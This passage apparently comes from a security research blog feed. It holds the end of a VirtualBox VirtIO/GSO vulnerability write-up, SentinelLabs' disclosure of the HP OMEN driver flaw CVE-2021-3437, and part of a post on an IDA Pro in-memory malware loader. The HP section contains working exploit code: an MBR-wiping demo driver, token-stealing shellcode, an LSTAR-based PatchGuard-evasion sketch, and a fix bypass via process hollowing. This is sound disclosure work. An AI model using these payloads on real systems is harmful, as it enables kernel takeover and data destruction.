   if (pThis->enmLinkState == PDMNETWORKLINKSTATE_UP)
   {
       struct mbuf *m = (struct mbuf *)pSgBuf->pvAllocator;
       if (m)
       {
           /*
            * A normal frame.
            */
           pSgBuf->pvAllocator = NULL;
           slirp_input(pThis->pNATState, m, pSgBuf->cbUsed);
       }
       else
       {
           /*
            * GSO frame, need to segment it.
            */
           /** @todo Make the NAT engine grok large frames?  Could be more efficient... */
#if 0 /* this is for testing PDMNetGsoCarveSegmentQD. */
           uint8_t         abHdrScratch[256];
#endif
           uint8_t const  *pbFrame = (uint8_t const *)pSgBuf->aSegs[0].pvSeg;
           PCPDMNETWORKGSO pGso    = (PCPDMNETWORKGSO)pSgBuf->pvUser;
           uint32_t const  cSegs   = PDMNetGsoCalcSegmentCount(pGso, pSgBuf->cbUsed);  Assert(cSegs > 1);
            for (uint32_t iSeg = 0; iSeg < cSegs; iSeg++)
            {
                size_t cbSeg;
                void  *pvSeg;
                m = slirp_ext_m_get(pThis->pNATState, pGso->cbHdrsTotal + pGso->cbMaxSeg, &pvSeg, &cbSeg);
               if (!m)
                   break;
 
#if 1
               uint32_t cbPayload, cbHdrs;
               uint32_t offPayload = PDMNetGsoCarveSegment(pGso, pbFrame, pSgBuf->cbUsed,
                                                           iSeg, cSegs, (uint8_t *)pvSeg, &cbHdrs, &cbPayload);
               memcpy((uint8_t *)pvSeg + cbHdrs, pbFrame + offPayload, cbPayload);
 
               slirp_input(pThis->pNATState, m, cbPayload + cbHdrs);
#else
...

The function used for sending packets from the guest to the network contained a separate code path for Generic Segmentation Offload (GSO) frames and was using memcpy to combine pieces of data.

The next question was of course “How much of this can I control?” and after going through various code paths and writing a simple Python-based constraint solver for all the limiting factors, the answer was “More than I expected” when using the Paravirtualization Network device called VirtIO.

Paravirtualized Networking

An alternative to fully emulating a device is to use paravirtualization. Unlike full virtualization, in which the guest is entirely unaware that it is a guest, paravirtualization has the guest install drivers that are aware that they are running in a guest machine in order to work with the host to transfer data in a much faster and more efficient manner.

VirtIO is an interface that can be used to develop paravirtualized drivers. One such driver is virtio-net, which comes with the Linux source and is used for networking. VirtualBox, like a number of other virtualization software, supports this as a network adapter:

The Adapter Type options

Similarly to the e1000, VirtIO networking works by using ring buffers to transfer data between the guest and the host (In this case called Virtqueues, or VQueues). However, unlike the e1000, VirtIO doesn’t use a single ring with head and tail registers for transmitting but instead uses three separate arrays:

  • A Descriptor array that contains the following data per-descriptor:
    • Address – The physical address of the data being transferred.
    • Length – The length of data at the address.
    • Flags – Flags that determine whether the Next field is in-use and whether the buffer is read or write.
    • Next – Used when there is chaining.
  • An Available ring – An array that contains indexes into the Descriptor array that are in use and can be read by the host.
  • A Used ring – An array of indexes into the Descriptor array that have been read by the host.

This looks as so:

When the guest wishes to send packets to the network, it adds an entry to the descriptor table, adds the index of this descriptor to the Available ring, and then increments the Available Index pointer:

Once this is done, the guest ‘kicks’ the host by writing the VQueue index to the Queue Notify register. This triggers the host to begin handling descriptors in the available ring. Once a descriptor has been processed, it is added to the Used ring and the Used Index is incremented:

Generic Segmentation Offload

Next, some background on GSO is required. To understand the need for GSO, it’s important to understand the problem that it solves for network cards.

Originally, the CPU would handle all of the heavy lifting, calculating transport layer checksums and segmenting large messages into smaller Ethernet-sized packets. Since this process can be quite slow when dealing with a lot of outgoing network traffic, hardware manufacturers started implementing offloading for these operations, removing the strain from the operating system.

For segmentation, this meant that instead of the OS having to pass a number of much smaller packets through the network stack, the OS just passes a single packet once.

It was noticed that this optimization could be applied to other protocols (beyond TCP and UDP) without the need for hardware support by delaying segmentation until just before the network driver receives the message. This resulted in the creation of GSO.

Since VirtIO is a paravirtualized device, the driver is aware that it is in a guest machine and so GSO can be applied between the guest and host. GSO is implemented in VirtIO by adding a context descriptor header to the start of the network buffer. This header can be seen in the following struct:

struct VNetHdr
{
   uint8_t  u8Flags;
   uint8_t  u8GSOType;
   uint16_t u16HdrLen;
   uint16_t u16GSOSize;
   uint16_t u16CSumStart;
   uint16_t u16CSumOffset;
};

The VirtIO header can be thought of as a similar concept to the Context Descriptor in e1000.

When this header is received, the parameters are verified for some level of validity in vnetR3ReadHeader. Then the function vnetR3SetupGsoCtx is used to fill the standard GSO struct used by VirtualBox across all network devices:

typedef struct PDMNETWORKGSO
{
   /** The type of segmentation offloading we're performing (PDMNETWORKGSOTYPE). */
   uint8_t             u8Type;
   /** The total header size. */
   uint8_t             cbHdrsTotal;
   /** The max segment size (MSS) to apply. */
   uint16_t            cbMaxSeg;
 
   /** Offset of the first header (IPv4 / IPv6).  0 if not not needed. */
   uint8_t             offHdr1;
   /** Offset of the second header (TCP / UDP).  0 if not not needed. */
   uint8_t             offHdr2;
   /** The header size used for segmentation (equal to offHdr2 in UFO). */
   uint8_t             cbHdrsSeg;
   /** Unused. */
   uint8_t             u8Unused;
} PDMNETWORKGSO;

Once this has been constructed, the VirtIO code uses a scatter-gather buffer to assemble the frame from the various descriptors:

                /* Assemble a complete frame. */
                for (unsigned int i = 1; i < elem.nOut && uSize > 0; i++)
                {
                    unsigned int cbSegment = RT_MIN(uSize, elem.aSegsOut[i].cb);
                    PDMDevHlpPhysRead(pDevIns, elem.aSegsOut[i].addr,
                                      ((uint8_t*)pSgBuf->aSegs[0].pvSeg) + uOffset,
                                      cbSegment);
                   uOffset += cbSegment;
                   uSize -= cbSegment;
               }

The frame is passed to the NAT code along with the new GSO structure, reaching the point that drew my interest originally.

Vulnerability Analysis

CVE-2021-2145 – Oracle VirtualBox NAT Integer Underflow Privilege Escalation Vulnerability

When the NAT code receives the GSO frame, it gets the full ethernet packet and passes it to Slirp (a library for TCP/IP emulation) as an mbuf message. In order to do this, VirtualBox allocates a new mbuf message and copies the packet to it. The allocation function takes a size and picks the next largest allocation size from three distinct buckets:

  1. MCLBYTES (0x800 bytes)
  2. MJUM9BYTES (0x2400 bytes)
  3. MJUM16BYTES (0x4000 bytes)

struct mbuf *slirp_ext_m_get(PNATState pData, size_t cbMin, void **ppvBuf, size_t *pcbBuf)
{
   struct mbuf *m;
   int size = MCLBYTES;
   LogFlowFunc(("ENTER: cbMin:%d, ppvBuf:%p, pcbBuf:%p\n", cbMin, ppvBuf, pcbBuf));
 
   if (cbMin < MCLBYTES)
       size = MCLBYTES;
   else if (cbMin < MJUM9BYTES)
       size = MJUM9BYTES;
   else if (cbMin < MJUM16BYTES)
       size = MJUM16BYTES;
   else
       AssertMsgFailed(("Unsupported size"));

If the supplied size is larger than MJUM16BYTES, an assertion is triggered. Unfortunately, this assertion is only compiled when the RT_STRICT macro is used, which is not the case in release builds. This means that execution will continue after this assertion is hit, resulting in a bucket size of 0x800 being selected for the allocation. Since the actual data size is larger, this results in a heap overflow when the user data is copied into the mbuf.

/** @def AssertMsgFailed
* An assertion failed print a message and a hit breakpoint.
*
* @param   a   printf argument list (in parenthesis).
*/
#ifdef RT_STRICT
# define AssertMsgFailed(a)  \
   do { \
       RTAssertMsg1Weak((const char *)0, __LINE__, __FILE__, RT_GCC_EXTENSION __PRETTY_FUNCTION__); \
       RTAssertMsg2Weak a; \
       RTAssertPanic(); \
   } while (0)
#else
# define AssertMsgFailed(a)     do { } while (0)
#endif

CVE-2021-2310 - Oracle VirtualBox NAT Heap-based Buffer Overflow Privilege Escalation Vulnerability

Throughout the code, a function called PDMNetGsoIsValid is used which verifies whether the GSO parameters supplied by the guest are valid. However, whenever it is used it is placed in an assertion. For example:

DECLINLINE(uint32_t) PDMNetGsoCalcSegmentCount(PCPDMNETWORKGSO pGso, size_t cbFrame)
{
   size_t cbPayload;
   Assert(PDMNetGsoIsValid(pGso, sizeof(*pGso), cbFrame));
   cbPayload = cbFrame - pGso->cbHdrsSeg;
   return (uint32_t)((cbPayload + pGso->cbMaxSeg - 1) / pGso->cbMaxSeg);
}

As mentioned before, assertions like these are not compiled in the release build. This results in invalid GSO parameters being allowed; a miscalculation can be caused for the size given to slirp_ext_m_get, making it less than the total copied amount by the memcpy in the for-loop. In my proof-of-concept, my parameters for the calculation of pGso->cbHdrsTotal + pGso->cbMaxSeg used for cbMin resulted in an allocation of 0x4000 bytes, but the calculation for cbPayload resulted in a memcpy call for 0x4065 bytes, overflowing the allocated region.

CVE-2021-2442 - Oracle VirtualBox NAT UDP Header Out-of-Bounds

The title of this post makes it seem like GSO is the only vulnerable offload mechanism in place here; however, another offload mechanism is vulnerable too: Checksum Offload.

Checksum offloading can be applied to various protocols that have checksums in their message headers. When emulating, VirtualBox supports this for both TCP and UDP.

In order to access this feature, the GSO frame needs to have the first bit of the u8Flags member set to indicate that the checksum offload is required. In the case of VirtualBox, this bit must always be set since it cannot handle GSO without performing the checksum offload. When VirtualBox handles UDP packets with GSO, it can end up in the function PDMNetGsoCarveSegmentQD in certain circumstances:

       case PDMNETWORKGSOTYPE_IPV4_UDP:
           if (iSeg == 0)
               pdmNetGsoUpdateUdpHdrUfo(RTNetIPv4PseudoChecksum((PRTNETIPV4)&pbFrame[pGso->offHdr1]),
                                        pbSegHdrs, pbFrame, pGso->offHdr2);

The function pdmNetGsoUpdateUdpHdrUfo uses the offHdr2 to indicate where the UDP header is in the packet structure. Eventually this leads to a function called RTNetUDPChecksum:

RTDECL(uint16_t) RTNetUDPChecksum(uint32_t u32Sum, PCRTNETUDP pUdpHdr)
{
   bool fOdd;
   u32Sum = rtNetIPv4AddUDPChecksum(pUdpHdr, u32Sum);
   fOdd = false;
   u32Sum = rtNetIPv4AddDataChecksum(pUdpHdr + 1, RT_BE2H_U16(pUdpHdr->uh_ulen) - sizeof(*pUdpHdr), u32Sum, &fOdd);
   return rtNetIPv4FinalizeChecksum(u32Sum);
}

This is where the vulnerability is. In this function, the uh_ulen property is completely trusted without any validation, which results in either a size that is outside of the bounds of the buffer, or an integer underflow from the subtraction of sizeof(*pUdpHdr).

rtNetIPv4AddDataChecksum receives both the size value and the packet header pointer and proceeds to calculate the checksum:

   /* iterate the data. */
   while (cbData > 1)
   {
       u32Sum += *pw;
       pw++;
       cbData -= 2;
   }

From an exploitation perspective, adding large amounts of out-of-bounds data together may not seem particularly interesting. However, if the attacker is able to re-allocate the same heap location for consecutive UDP packets, increasing the UDP size parameter by two bytes each time, it is possible to calculate the difference between each checksum and disclose the out-of-bounds data.

On top of this, it’s also possible to use this vulnerability to cause a denial-of-service against other VMs in the network:

Got another Virtualbox vuln fixed (CVE-2021-2442)

Works as both an OOB read in the host process, as well as an integer underflow. In some instances, it can also be used to remotely DoS other Virtualbox VMs! pic.twitter.com/Ir9YQgdZQ7

— maxpl0it (@maxpl0it) August 1, 2021

Outro

Offload support is commonplace in modern network devices so it’s only natural that virtualization software emulating devices does it as well. While most public research has been focused on their main components, such as ring buffers, offloads don’t appear to have had as much scrutiny. Unfortunately in this case I didn’t manage to get an exploit together in time for the Pwn2Own contest, so I ended up reporting the first two to the Zero Day Initiative and the checksum bug to Oracle directly.

CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices

14 September 2021 at 11:00

Executive Summary

  • SentinelLabs has discovered a high severity flaw in an HP OMEN driver affecting millions of devices worldwide.
  • Attackers could exploit these vulnerabilities to locally escalate to kernel-mode privileges. With this level of access, attackers can disable security products, overwrite system components, corrupt the OS, or perform any malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to HP on Feb 17, 2021 and the vulnerability is tracked as CVE-2021-3437, marked with CVSS Score 7.8.
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Introduction

HP OMEN Gaming Hub, previously known as HP OMEN Command Center, is a software product that comes preinstalled on HP OMEN desktops and laptops. This software can be used to control and optimize settings such as device GPU, fan speeds, CPU overclocking, memory and more. The same software is used to set and adjust lighting and other controls on gaming devices and accessories such as mouse and keyboard.

Following on from our previous research into other HP products, we discovered that this software utilizes a driver that contains vulnerabilities that could allow malicious actors to achieve a privilege escalation to kernel mode without needing administrator privileges.

CVE-2021-3437 essentially derives from the HP OMEN Gaming Hub software using vulnerable code partially copied from an open source driver. In this research paper, we present details explaining how the vulnerability occurs and how it can be mitigated. We suggest best practices for developers that would help reduce the attack surface provided by device drivers with exposed IOCTLs handlers to low-privileged users.

Technical Details

Under the hood of HP OMEN Gaming Hub lies the HpPortIox64.sys driver, C:\Windows\System32\drivers\HpPortIox64.sys. This driver is developed by HP as part of OMEN, but it is actually a partial copy of another problematic driver, WinRing0.sys, developed by OpenLibSys.

The link between the two drivers can readily be seen: on some signed HP versions, the metadata information shows the original filename and product name:

File Version information from CFF Explorer

Unfortunately, issues with the WinRing0.sys driver are well-known. This driver enables user-mode applications to perform various privileged kernel-mode operations via IOCTLs interface.

The operations provided by the HpPortIox64.sys driver include read/write kernel memory, read/write PCI configurations, read/write IO ports, and MSRs. Developers may find it convenient to expose a generic interface of privileged operations to user mode, keeping as much code as possible out of the kernel module for stability reasons.

The IOCTL codes 0x9C4060CC, 0x9C4060D0, 0x9C4060D4, 0x9C40A0D8, 0x9C40A0DC and 0x9C40A0E0 allow user mode applications with low privileges to read/write 1/2/4 bytes to or from an IO port. This could be leveraged in several ways to ultimately run code with elevated privileges in a manner we have previously described here.

The following image highlights the vulnerable code that allows unauthorized access to IN/OUT instructions, with IN instructions marked in red and OUT instructions marked in blue:

The Vulnerable Code – unauthorized access to IN/OUT instructions

Since I/O privilege level (IOPL) equals the current privilege level (CPL), it is possible to interact with peripheral devices such as internal storage and GPU to either read/write directly to the disk or to invoke Direct Memory Access (DMA) operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process.

For the purposes of illustration, we wrote this sample driver to demonstrate the attack without pursuing an actual exploit:

unsigned char port_byte_in(unsigned short port) {
	return __inbyte(port);
}

void port_byte_out(unsigned short port, unsigned char data) {
	__outbyte(port, data);
}

void port_long_out(unsigned short port, unsigned long data) {
	__outdword(port, data);
}

unsigned short port_word_in(unsigned short port) {
	return __inword(port);
}

#define BASE 0x1F0

void read_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x20); //Send the read command


	for (int j = 0; j < sector_count; j++) {
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) {
			USHORT a = port_word_in(BASE);
			DbgPrint("0x%x, ", a);
		}
	}
}

void write_sectors_ATA_PIO(unsigned char LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x30);

	for (int j = 0; j < sector_count; j++)
	{
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) {
			port_long_out(BASE, 0xffffffff);
		}
	}
}

static void ATA_wait_BSY() // Wait for BSY to be 0
{
	while (port_byte_in(BASE + 7) & STATUS_BSY);
}

static void ATA_wait_DRQ() // Wait for DRQ to be 1
{
	while (!(port_byte_in(BASE + 7) & STATUS_RDY));
}

NTSTATUS DriverEntry(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry)
{
	UNREFERENCED_PARAMETER(registry);
	driver_object->DriverUnload = drv_unload;

	DbgPrint("Before: \n");
	read_sectors_ATA_PIO(0, 1);
	write_sectors_ATA_PIO(0, 1);
	
	DbgPrint("\nAfter: \n");
	read_sectors_ATA_PIO(0, 1);

	return STATUS_SUCCESS;
}

This ATA PIO read/write is based on LearnOS. Running this driver will result in the following DebugView prints:

Debug logging from the driver in DbgView utility

Trying to restart this machine will result in an ‘Operating System not found’ error message because our demo driver destroyed the first sector of the disk (the MBR).

The machine fails to boot due to corrupted MBR

It’s worth mentioning that the impact of this vulnerability is platform dependent. It can potentially be used to attack device firmware or perform legacy PCI access by accessing ports 0xCF8/0xCFC. Some laptops may have embedded controllers which are reachable via IO port access.

Another interesting vulnerability in this driver is an arbitrary MSR read/write, accessible via IOCTLs 0x9C402084 and 0x9C402088. Model-Specific Registers (MSRs) are registers for querying or modifying CPU data. RDMSR and WRMSR are used to read and write an MSR, respectively. Documentation for WRMSR and RDMSR can be found in the Intel(R) 64 and IA-32 Architectures Software Developer’s Manual, Volume 2, Chapter 5.

In the following image, arbitrary MSR read is marked in green, MSR write in blue, and HLT is marked in red (accessible via IOCTL 0x9C402090, which allows executing the instruction in a privileged context).

Vulnerable code with unauthorized access to MSR registers

On most modern systems, MSR_LSTAR is used only during the system call transition from user mode to kernel mode:

MSR_LSTAR MSR register in WinDbg

It should be noted that on 64-bit systems with KPTI enabled, the LSTAR MSR points to nt!KiSystemCall64Shadow.

The entire transition process looks something like this:

The entire process of transition from the User Mode to Kernel mode

These vulnerabilities may allow malicious actors to execute code in kernel mode very easily, since the transition to kernel mode is done via an MSR. This is essentially an exposed WRMSR instruction (via IOCTL) that gives an attacker an arbitrary pointer overwrite primitive: we can overwrite the LSTAR MSR and achieve privilege escalation to kernel mode without needing admin privileges to communicate with this device driver.

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without any ACL enforcement (note: some drivers handle access to their devices independently in their IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device
The function that handles IOCTLs to write to arbitrary MSRs

Weaponizing this kind of vulnerability is trivial as there’s no need to reinvent anything; we just took the msrexec project and armed it with our code to elevate our privileges.

Our payload to elevate privileges:

	//extern "C" void elevate_privileges(UINT64 pid);
	//DWORD current_process_id = GetCurrentProcessId();

	// Function-pointer types for the DbgPrint and ExAllocatePool routines resolved below.
	using dbg_print_t = ULONG(*)(const char*, ...);
	using ex_alloc_pool_t = void*(*)(ULONG, SIZE_T);

	vdm::msrexec_ctx msrexec(_write_msr);
	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
	{
		const auto dbg_print = reinterpret_cast<dbg_print_t>(get_kroutine(krnl_base, "DbgPrint"));
		const auto ex_alloc_pool = reinterpret_cast<ex_alloc_pool_t>(get_kroutine(krnl_base, "ExAllocatePool"));

		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
		dbg_print("> cr4 -> 0x%p\n", __readcr4());
		elevate_privileges(current_process_id);
	});

The assembly payload:

elevate_privileges proc
_start:
	push rsi
	mov rsi, rcx                  ; rcx = PID of the process to elevate
	mov rbx, gs:[188h]            ; KPCR.Prcb.CurrentThread (current KTHREAD)
	mov rbx, [rbx + 220h]         ; owning EPROCESS of the current thread
	
__findsys:
	mov rbx, [rbx + 448h]         ; EPROCESS.ActiveProcessLinks.Flink
	sub rbx, 448h                 ; back to the start of the next EPROCESS
	mov rcx, [rbx + 440h]         ; EPROCESS.UniqueProcessId
	cmp rcx, 4                    ; PID 4 = the System process
	jnz __findsys

	mov rax, rbx                  ; rax = System EPROCESS
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]

__findarg:
	mov rbx, [rbx + 448h]         ; walk the process list again...
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, rsi                  ; ...until the target PID is found
	jnz __findarg

	mov rcx, [rax + 4b8h]         ; System EPROCESS.Token
	and cl, 0f0h                  ; keep only the EX_FAST_REF pointer bits
	mov [rbx + 4b8h], rcx         ; overwrite the target process token

	xor rax, rax
	pop rsi
	ret
elevate_privileges endp

Note that this payload is written specifically for Windows 10 20H2: the EPROCESS field offsets hardcoded above differ between Windows builds.

Let’s see what it looks like in action.

OMEN Gaming Hub Privilege Escalation

Initially, HP developed a fix that tried to verify the user-mode applications communicating with the driver. From kernel mode, it opens the nt!_FILE_OBJECT of the calling process, parses its PE image and validates its digital signature. Besides being unsafe in itself, this implementation (which also introduced several additional vulnerabilities) did not fix the original issue: the checks are easy to bypass using techniques such as Process Hollowing. Consider the following program as an example:

#include <windows.h>
#include <stdio.h>

int main() {

    puts("Opening a handle to HpPortIO\r\n");

    HANDLE hDevice = CreateFileW(L"\\\\.\\HpPortIO", FILE_ANY_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {

        printf("failed! getlasterror: %lu\r\n", GetLastError());

        return -1;

    }

    printf("succeeded! handle: %p\r\n", hDevice);

    return 0;

}

Running this program against the fix without Process Hollowing will result in:

    Opening a handle to HpPortIO failed! 
    getlasterror: 87

While running this with Process Hollowing will result in:

    Opening a handle to HpPortIO succeeded! 
    handle: <HANDLE>

It’s worth mentioning that security mechanisms such as PatchGuard and security hypervisors should mitigate this exploit to a certain extent. However, PatchGuard can still be bypassed: some of the structures and data it protects are MSRs, but since PatchGuard samples these assets only periodically, restoring the original values quickly enough may allow an attacker to evade detection.
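Conceptually, an attacker who wants to stay under PatchGuard's radar keeps the window in which LSTAR is modified as short as possible. The following is only a sketch of that timing argument, using hypothetical read_msr/write_msr wrappers around the driver's IOCTLs rather than the msrexec project's actual flow:

// Hypothetical wrappers around the driver's MSR IOCTLs, for illustration only.
extern unsigned long long read_msr(unsigned long msr);
extern void write_msr(unsigned long msr, unsigned long long value);
extern void trigger_syscall(void);   // any system call will do

#define IA32_LSTAR 0xC0000082

void swap_lstar_briefly(unsigned long long hook_stub) {
	unsigned long long original = read_msr(IA32_LSTAR); // save the real syscall entry

	write_msr(IA32_LSTAR, hook_stub);  // point the syscall entry at attacker code
	trigger_syscall();                 // enter the kernel once through the hook;
	                                   // the hook should restore LSTAR immediately
	write_msr(IA32_LSTAR, original);   // restore from user mode as well

	// The shorter this window, the less likely a periodic PatchGuard check is
	// to observe the tampered value.
}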

Impact

An exploitable kernel driver vulnerability can take an unprivileged user all the way to SYSTEM, since the vulnerable driver is locally available to anyone.

This high severity flaw, if exploited, could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. One obvious abuse of such vulnerabilities is bypassing security products.

An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques, such as lateral movement, to pivot to the broader network.

Impacted products:

  • HP OMEN Gaming Hub prior to version 11.6.3.0 is affected
  • HP OMEN Gaming Hub SDK Package prior to version 1.0.44 is affected

Development Suggestions

To reduce the attack surface exposed by device drivers with accessible IOCTL handlers, developers should enforce strong ACLs on device objects, validate user input, and avoid exposing a generic interface to kernel-mode operations.
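As one concrete illustration of the ACL recommendation, a driver can attach a restrictive security descriptor to its device object at creation time. The following is a minimal sketch using the WDK's IoCreateDeviceSecure with one of the built-in SDDL strings; the device name is made up for the example.

#include <ntddk.h>
#include <wdmsec.h>   // IoCreateDeviceSecure and the SDDL_DEVOBJ_* strings

NTSTATUS create_restricted_device(PDRIVER_OBJECT driver_object, PDEVICE_OBJECT *device_object)
{
	UNICODE_STRING device_name = RTL_CONSTANT_STRING(L"\\Device\\ExampleRestrictedIo");

	// SDDL_DEVOBJ_SYS_ALL_ADM_ALL: full access for SYSTEM and Administrators only,
	// so an unprivileged process cannot even open a handle to send IOCTLs.
	return IoCreateDeviceSecure(driver_object,
		0,                        // no device extension
		&device_name,
		FILE_DEVICE_UNKNOWN,
		FILE_DEVICE_SECURE_OPEN,  // apply the descriptor to namespace opens
		FALSE,                    // not exclusive
		&SDDL_DEVOBJ_SYS_ALL_ADM_ALL,
		NULL,                     // no device class GUID
		device_object);
}

Input validation in the IOCTL dispatch routine is still required on top of this; the ACL only limits who can reach the interface at all.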

Remediation

HP released a Security Advisory on September 14th to address this vulnerability. We recommend customers, both enterprise and consumer, review the HP Security Advisory for complete remediation details.

Conclusion

This high severity vulnerability affects millions of PCs and users worldwide. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, using any OMEN-branded PC with the vulnerable driver utilized by OMEN Gaming Hub makes the user potentially vulnerable. Therefore, we urge users of OMEN PCs to ensure they take appropriate mitigating measures without delay.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

17 Feb 2021 – Initial report
17 Feb 2021 – HP requested more information
14 May 2021 – HP sent us a fix for validation
16 May 2021 – SentinelLabs notified HP that the fix was insufficient
07 Jun 2021 – HP delivered another fix, this time disabling the whole feature
27 Jul 2021 – HP released an update to the software on the Microsoft Store
14 Sep 2021 – HP released a security advisory for CVE-2021-3437
14 Sep 2021 – SentinelLabs’ research published

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed, so downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. First, if the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making them easier to spot. A plugin runs after the IDA database is initialized, meaning a binary has already been loaded into the database. A loader, by contrast, is the component that loads a binary into the IDA database in the first place.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL in which the memory-loading capabilities are implemented. Its main functionality is to take a buffer of bytes from any source and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to disk. The loader accepts zip-format files (.zip). After accepting a zip file, it will display the files contained in the archive and allow you to choose the one you want to work with.

MemZipLoader will extract the chosen file from the input ZIP into a memory buffer and load it into IDA without writing it to disk; only the (still encrypted) zip file remains on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download the zip with the binaries from here.
  2. Extract the zip files to a folder.
  3. Place the memory loader DLLs in the IDA Pro directory:
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)
  4. Place the loaders in the loaders directory of IDA:
      1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:

MemZipLoader:

  1. Open IDA and choose zip file.
  2. IDA should automatically suggest the loader:
  3. Once selected, a list of the files from the zip will be displayed:
  4. IDA will then use the loader code and load it as if the binary was a local file on the system.

UrlLoader:

  1. Open any file on your computer in a directory you have write privileges to.
  2. UrlLoader will appear among the suggested loaders.
  3. After you choose UrlLoader, you will be asked to enter a URL:
  4. The loader will fetch the file from the network location you entered. IDA Pro will then use the loader code and load the binary as if it were a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio
    2. An IDA loader has three key parts: the accept function, the load function, and the loader definition block. Your dllmain file is where the loader definition lives.
    3. accept_file – this function returns a value indicating whether the loader is relevant to the binary currently being loaded into IDA. For example, if you are loading a PE, build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading the file into the database. Each loader implements this differently, so there is not much to generalize here. Documentation on loaders can be found here; a bare-bones skeleton is sketched below.
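To make the shape of a loader concrete, here is a skeleton of the three parts described above. It is modeled on the IDA 7.5 SDK's loader.hpp; the exact signatures and loader_t field order should be checked against your own SDK headers, and the format name and base address are made up for the example.

#include <ida.hpp>
#include <idp.hpp>
#include <loader.hpp>
#include <bytes.hpp>
#include <diskio.hpp>
#include <segment.hpp>

// accept_file – decide whether this loader applies to the input.
static int idaapi accept_file(qstring *fileformatname, qstring *processor,
                              linput_t *li, const char *filename)
{
	// Real code would sniff magic bytes from 'li' here.
	*fileformatname = "Example memory image";
	if ( processor != NULL )
		*processor = "metapc";
	return 1;   // non-zero: offer this loader in the "Load a new file" dialog
}

// load_file – map the input bytes into the database.
static void idaapi load_file(linput_t *li, ushort neflags, const char *fileformatname)
{
	int64 size = qlsize(li);
	qvector<uchar> buf;
	buf.resize((size_t)size);
	qlread(li, buf.begin(), buf.size());

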